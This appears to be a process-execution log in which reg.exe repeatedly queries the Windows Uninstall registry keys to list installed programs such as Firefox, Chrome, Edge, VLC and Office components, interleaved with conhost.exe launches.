C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 124.0.2 (x64 en-US)"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge Update"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft EdgeWebView"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4d8dcf8c-a72a-43e1-9833-c12724db736e}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{61087a79-ac85-455c-934d-1fa22cc64f36}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{63880b41-04fc-4f9b-92c4-4455c255eb8c}

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7DAD0258-515C-3DD4-8964-BD714199E0F7}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BF08E976-B92E-4336-B56F-2171179476C4}

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d87ae0f4-64a6-4b94-859a-530b9c313c27}

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef5af41f-d68c-48f7-bfb0-5055718601fc}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F6080405-9FA8-4CAA-9982-14E95D1A3DAC}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 124.0.2 (x64 en-US)"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\36c3a589-07cb-5a5c-93f2-7ca0c417a328

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge Update"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft EdgeWebView"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC

C:\Windows\system32\reg.exe

